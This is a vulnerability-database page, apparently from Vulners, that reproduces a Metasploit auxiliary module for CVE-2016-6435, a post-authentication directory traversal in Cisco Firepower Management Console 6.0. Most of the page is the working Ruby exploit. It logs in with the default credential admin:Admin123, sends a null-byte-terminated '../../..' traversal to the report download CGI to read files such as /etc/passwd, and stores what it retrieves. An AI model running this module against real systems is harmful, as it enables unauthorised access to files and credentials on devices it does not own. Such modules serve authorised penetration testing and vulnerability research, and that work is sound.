Vulners
Lucene search
Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
🗓️ 01 Sep 2024 00:00:00Reported by Matt, sinn3r, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 182 Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2016-6435 | 29 May 201815:50 | – | circl |
 | Cisco Firepower Management Center Console Local File Inclusion Vulnerability | 5 Oct 201616:00 | – | cisco |
 | Cisco Firepower Threat Management Console Remote Command Execution Vulnerability | 8 Oct 201600:00 | – | cnvd |
 | Cisco Firepower Management Center Arbitrary File Read (CVE-2016-6435) | 20 Dec 202000:00 | – | checkpoint_advisories |
 | CVE-2016-6435 | 6 Oct 201610:00 | – | cve |
 | CVE-2016-6435 | 6 Oct 201610:00 | – | cvelist |
 | Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion | 5 Oct 201600:00 | – | exploitdb |
 | Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion | 5 Oct 201600:00 | – | exploitpack |
 | Cisco Firepower Threat Management Console Local File Inclusion | 5 Oct 201600:00 | – | korelogic |
 | Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal | 9 Jan 201720:39 | – | metasploit |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
'Description' => %q{
This module exploits a directory traversal vulnerability in Cisco Firepower Management
under the context of www user. Authentication is required to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt', # Original discovery && PoC
'sinn3r', # Metasploit module
],
'References' =>
[
['CVE', '2016-6435'],
['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking']
],
'DisclosureDate' => '2016-10-10',
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'Auto'
}
))
register_options(
[
# admin:Admin123 is the default credential for 6.0.1
OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd'])
])
end
def do_login(ip)
console_user = datastore['USERNAME']
console_pass = datastore['PASSWORD']
uri = normalize_uri(target_uri.path, 'login.cgi')
print_status("Attempting to login in as #{console_user}:#{console_pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'username' => console_user,
'password' => console_pass,
'target' => ''
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
end
res_cookie = res.get_cookies
if res.code == 302 && res_cookie.include?('CGISESSID')
cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
vprint_status("CGI Session ID: #{cgi_sid}")
print_good("Authenticated as #{console_user}:#{console_pass}")
report_cred(ip: ip, user: console_user, password: console_pass)
return cgi_sid
end
nil
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: rport,
service_name: 'cisco',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def download_file(cgi_sid, file)
file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"
print_status("Requesting: #{file_path}")
send_request_cgi({
'method' => 'GET',
'cookie' => "CGISESSID=#{cgi_sid}",
'uri' => normalize_uri(target_uri.path, 'events/reports/view.cgi'),
'vars_get' => {
'download' => '1',
'files' => file_path
}
})
end
def remote_file_exists?(res)
(
res.headers['Content-Disposition'] &&
res.headers['Content-Disposition'].match(/attachment; filename=/) &&
res.headers['Content-Type'] &&
res.headers['Content-Type'] == 'application/octet-stream'
)
end
def save_file(res, ip)
fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])
path = store_loot(
'cisco.https',
'application/octet-stream',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
def run_host(ip)
cgi_sid = do_login(ip)
unless cgi_sid
fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
end
res = download_file(cgi_sid, datastore['FILEPATH'])
if res.nil?
print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
elsif remote_file_exists?(res)
save_file(res, ip)
else
print_error("Remote file not found: #{datastore['FILEPATH']}")
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 24
CVSS 36.5
EPSS0.55026